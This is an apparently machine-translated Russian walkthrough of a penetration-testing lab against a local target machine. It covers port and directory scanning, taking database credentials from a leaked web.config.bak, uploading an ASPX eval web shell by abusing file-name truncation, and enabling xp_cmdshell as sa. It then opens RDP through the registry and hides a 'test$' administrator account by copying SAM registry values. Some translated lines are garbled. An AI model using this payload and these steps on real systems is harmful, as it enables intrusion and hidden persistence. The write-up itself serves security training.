атакующая машина Кали: 192.168.111.146
Целевой дрон: 192.168.111.129
Настройка среды, сетевые карты настроены в режиме NAT в том же сегменте сети.
ip
nmap -sS 192.168.111.0/24
или
netdiscover -i eth0 -r 192.168.111.0/24
nmap -A -p- -T4 192.168.111.129
1433: порт по умолчанию сервера sql.
27689: Посетите, чтобы узнать, какой сервисный порт
В системе загрузки и скачивания файлов для взлома имени пользователя и пароля использовался Burp, но взрыв не увенчался успехом.
Оглавление
На основе этого 27689порт,Сделать скан Оглавление,Посмотрите, есть ли чувствительность Оглавление
dirsearch -u http://192.168.111.129:27689
dirb http://192.168.111.129:27689
gobuster dir -u http://192.168.111.129:27689 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -x php,txt,html
Я использую dirsearch для сканирования
Посетите: http://192.168.111.129:27689/admin/admin.aspx.
Посетите http://192.168.111.129:27689/Robots.txt.
Продолжайте посещать http://192.168.111.129:27689/web.config.bak.
Вы можете видеть, что файл был загружен. Обычно файл .bak является файлом резервной копии. Проверьте файл резервной копии и получите имя базы данных SQL-сервера FileManage, имя пользователя и пароль downsql.
Подключиться к базе данных
Получите имя пользователя admin и пароль asdadwn_d2112.
Войдите в систему загрузки и скачивания файлов. При загрузке файлов обнаружено, что разрешена загрузка только txt и jpg. Ограничения черного списка довольно строгие.
Если имя файла слишком длинное, система перехватит первые 32 символа, включая системное время, в качестве имени файла.
Думаем: если имя загружаемого файла превышает 32 символа, троянский файл будет загружаться через переполнение, см. ID55, а имя загружаемого файла будет aaaaaaaa.aspx.txt.
Имя файла: аааааааа.aspx.txt
内容:<%@ Page Language="Jscript"%><%eval(Request.Item["666"],"unsafe");%>
Успешно загружено
Найдите путь к файлу. Согласно сообщению об ошибке, путь к файлу — ../upfile/affix/"+fileName.
Путь к файлу: http://192.168.111.129:27689/upfile/affix/638582066907968750-aaaaaaaa.aspx.
Подключитесь к веб-шеллу: используйте муравьиный меч для подключения
С помощью вышеописанной серии операций вы можете интуитивно увидеть наличие любой уязвимости при загрузке файла.
Нажмите на имя файла, чтобы загрузить файл
Путь к файлу здесь уже известен../upfile/affix/"+fileName
http://192.168.111.129:27689/upfile/affix/636625082296562500-bbbbbbbb.aspx
Просмотрите содержимое файла и получите пароль для подключения z
Используйте муравьиный меч, чтобы связать веб-шелл
Щелкните правой кнопкой мыши и выполните терминал whoami.
данные Библиотека Повышение привилегийпредпосылки:
1、Сервер запускает службу библиотеки данных.
2. Получите самый высокий пароль пользователя Разрешения, который
(За исключением библиотеки данных Access, другие библиотеки данных в основном существуют в библиотеке данных. Возможность привилегий)
Мы подключились к базе данных, теперь нам нужно получить логин и пароль sa.
Имя пользователя и пароль sa были найдены в резервном файле web.config.bak.2017-12-12.
Соединение sa, имя базы данных FileManage, имя пользователя sa, пароль csp-pte@sa
Сервер SQL имеет встроенный мастер системной базы данных, а xp_cmdshell находится в хранимой процедуре и расширенной хранимой процедуре. Если она содержит sys.xp_cmdshell, это означает, что целевой веб-сайт не удалил этот компонент.
Выберите базу данных, создайте новый запрос и выполните команду
EXEC master.dbo.xp_cmdshell 'whoam'
успех Повышение привилегий
Примечание. Если сообщение об ошибке отключено при выполнении команды, используйте команду для открытия xp_cmdshell (можно открыть только с разрешения sa).
EXEC sp_configure 'show advanced options', 1
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
Здесь вы также можете использовать xp_cmdshell для открытия удаленного рабочего стола.,Создать нового пользователя,Делать Разрешение на обслуживание
Откройте команду 3389порт удаленного рабочего стола через реестр.
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
деформация xp_cmdshell
EXEC master.dbo.xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
Проверить статус порта
EXEC master.dbo.xp_cmdshell 'netstat -an|find "3389"'
Добавьте теневого пользователя и присоединитесь к группе администраторов.
EXEC master.dbo.xp_cmdshell 'net user test$ 123456 /add'
EXEC master.dbo.xp_cmdshell 'net localgroup administrators test$ /add'
Win+R введите mstsc для подключения к удаленному рабочему столу
Введите новую теневую учетную запись и пароль.
Теневая учетная запись — это относительно скрытый пользователь в Windows.,Обычно проникает позже Разрешение на Он будет использоваться на этапе обслуживания. Теневые счета в основном используются в целях решения на При обслуживании, сначала создав учетную запись с символом $, а затем используя реестр для изменения значения внутри, администратор не может просмотреть учетную запись, созданную злоумышленником, через cmd и управление компьютером, тем самым достигая разрешения. на обслуживание。
Войти успешно
Откройте cmd и введите regedit, найдите HKEY_LOCAL_MACHINE\SAM\SAM, измените разрешения SAM, дайте администраторам полный доступ и найдите учетную запись test$ после перезапуска.
Найдите данные значения F пользователя-администратора.
Скопируйте значение данных F соответствующего элемента пользователя администратора в значение данных F соответствующего элемента пользователя test$.
Соответствующие элементы 000003F4 экспортируются и называются test.reg и 1.reg соответственно.
Удалите пользователя test$ и импортируйте test.reg и 1.reg в реестр.
net user test$ /del
regedit /s test.reg
regedit /s 1.reg
В настоящее время пользователь test$ больше не отображается в группе пользователей.